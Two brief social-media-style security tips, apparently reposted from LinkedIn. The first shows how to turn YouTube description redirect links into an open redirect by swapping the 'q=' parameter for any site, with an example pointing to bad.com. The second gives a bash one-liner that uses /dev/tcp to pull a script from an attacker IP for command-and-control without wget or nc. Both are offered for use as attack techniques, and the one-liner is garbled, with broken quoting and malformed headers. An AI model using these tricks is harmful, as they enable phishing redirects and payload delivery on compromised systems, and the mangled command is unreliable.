February 24, 2025 at 10:58AM

■■■□□ YT exploit semi-deep dive: Two YouTube redirect abuses. First, copy a redirect URL from a video’s description, paste it out, and edit the original website to whatever website you’d like to create an open redirect. Example: Zcw&q=https%3A%2F%2Fbad.com%2F&v=ivbQ_Ubo3YU Then simply change the “q=” parameter to any URL, even a malicious one because YouTube doesn’t revalidate…

February 22, 2025 at 12:56PM

5️⃣ 1 liner bash for C2 without using any native program like wget, nc etc, esp containers. bash-c “exec 3/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n’ >&3; cat yourfile.sh’ Source: Linkedin | Harvey Spec